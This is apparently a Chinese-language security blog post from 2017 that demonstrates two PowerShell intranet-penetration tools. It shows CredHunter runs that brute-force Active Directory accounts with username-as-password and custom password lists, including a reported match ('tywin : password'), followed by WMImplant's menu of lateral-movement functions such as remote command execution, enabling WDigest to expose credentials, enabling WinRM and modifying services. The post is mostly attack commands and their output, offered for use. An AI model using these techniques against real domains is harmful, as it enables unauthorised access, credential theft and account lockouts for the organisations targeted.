MENU

CredHunter & WMImplant

March 30, 2017 • Security

最近两个内网渗透PowerShell脚本的使用

CredHunter

找出所有使用用户名作为密码的域用户:

PS C:\Users\jamie\Desktop> Invoke-CredHunter -Verbose
[*] WARNING: This module is not opsec safe! Be wary of locking accounts
[*] Do you want to continue?: Y
VERBOSE: Get-DomainSearcher search string: LDAP://DC=lannister,DC=house
Brute Forcing Active Directory lannister.house
VERBOSE: Checking Administrator : Administrator
VERBOSE: Checking Guest : Guest
VERBOSE: Checking krbtgt : krbtgt
VERBOSE: Checking jamie : jamie
VERBOSE: Checking tywin : tywin
VERBOSE: Checking tyrion : tyrion
VERBOSE: Checking cersei : cersei
VERBOSE: Checking kevan : kevan
PS C:\Users\jamie\Desktop>

使用通配符查找所有使用弱口令的域帐户:

PS C:\Users\jamie\Desktop> Invoke-CredHunter -Verbose -UserName “*admin*”
[*] WARNING: This module is not opsec safe! Be wary of locking accounts
[*] Do you want to continue?: Y
VERBOSE: Get-DomainSearcher search string: LDAP://DC=lannister,DC=house
Brute Forcing Active Directory lannister.house
VERBOSE: Checking Administrator : Administrator
PS C:\Users\jamie\Desktop>

发现有 LDAP AdminCount=1 标志的用户的弱口令:

PS C:\Users\jamie\Desktop> Invoke-CredHunter -Verbose -AdminCount
[*] WARNING: This module is not opsec safe! Be wary of locking accounts
[*] Do you want to continue?: Y
VERBOSE: Get-DomainSearcher search string: LDAP://DC=lannister,DC=house
VERBOSE: Checking for adminCount=1
Brute Forcing Active Directory lannister.house
VERBOSE: Checking Administrator : Administrator
VERBOSE: Checking krbtgt : krbtgt
PS C:\Users\jamie\Desktop>

命令行上使用自定义的密码:

PS C:\Users\jamie\Desktop> Invoke-CredHunter -Verbose -CustomPasswords password,letmein,secret
[*] WARNING: This module is not opsec safe! Be wary of locking accounts
[*] Do you want to continue?: Y
VERBOSE: Get-DomainSearcher search string: LDAP://DC=lannister,DC=house
Brute Forcing Active Directory lannister.house
VERBOSE: Checking Administrator : Administrator
VERBOSE: Checking Administrator : password
VERBOSE: Checking Administrator : letmein
VERBOSE: Checking Administrator : secret
VERBOSE: Checking Guest : Guest
VERBOSE: Checking Guest : password
VERBOSE: Checking Guest : letmein
VERBOSE: Checking Guest : secret
VERBOSE: Checking krbtgt : krbtgt
VERBOSE: Checking krbtgt : password
VERBOSE: Checking krbtgt : letmein
VERBOSE: Checking krbtgt : secret
VERBOSE: Checking jamie : jamie
VERBOSE: Checking jamie : password
VERBOSE: Checking jamie : letmein
VERBOSE: Checking jamie : secret
VERBOSE: Checking tywin : tywin
VERBOSE: Checking tywin : password
Match found! tywin : password
VERBOSE: Checking tywin : letmein
VERBOSE: Checking tywin : secret
VERBOSE: Checking tyrion : tyrion
VERBOSE: Checking tyrion : password
VERBOSE: Checking tyrion : letmein
VERBOSE: Checking tyrion : secret
VERBOSE: Checking cersei : cersei
VERBOSE: Checking cersei : password
VERBOSE: Checking cersei : letmein
VERBOSE: Checking cersei : secret
VERBOSE: Checking kevan : kevan
VERBOSE: Checking kevan : password
VERBOSE: Checking kevan : letmein
VERBOSE: Checking kevan : secret
PS C:\Users\jamie\Desktop>

WMImplant

功能菜单

change_user                         -   Change the context of the user you will execute WMI commands as
exit                                -   Exits WMImplant
gen_cli                             -   Generate the command line command to use WMImplant non-interactively
set_default                         -   Sets the targeted system's WMI property back to its default value
help                                -   View the list of commands and descriptions

文件操作

cat                                 -   Reads the contents of a file
download                            -   Download a file from the targeted machine
ls                                  -   File/Directory listing of a specific directory
search                              -   Search for a file on a user-specified drive
upload                              -   Upload a file to the targeted machine

横向渗透

command_exec                        -   Run a command line command and receive the output
disable_wdigest                     -   Removes registry value UseLogonCredential
disable_winrm                       -   Disables WinRM on the targeted system
enable_wdigest                      -   Adds registry value UseLogonCredential
enable_winrm                        -   Enables WinRM on the targeted system
registry_mod                        -   Modify the registry on the targeted machine
remote_posh                         -   Run a PowerShell script on a remote machine and receive the output
sched_job                           -   Manipulate scheduled jobs
service_mod                         -   Create, delete, or modify system services

进程操作

process_kill                        -   Kill a process via name or process id on the targeted machine
process_start                       -   Start a process on the targeted machine
ps                                  -   Process listing

系统操作

active_users                        -   List domain users with active processes on the targeted system
basic_info                          -   Used to enumerate basic metadata about the targeted system
drive_list                          -   List local and network drives
ifconfig                            -   Receive IP info from NICs with active network connections
installed_programs                  -   Receive a list of the installed programs on the targeted machine
logoff                              -   Log users off the targeted machine
reboot                              -   Reboot the targeted machine
power_off                           -   Power off the targeted machine
vacant_system                       -   Determine if a user is away from the system

日志操作

logon_events                        -   Identify users that have logged onto a system

Bj2ENbQ.png

RJV7niQ.png

3Yrq6fJ.gif

Archives QR Code
QR Code for this page
Tipping QR Code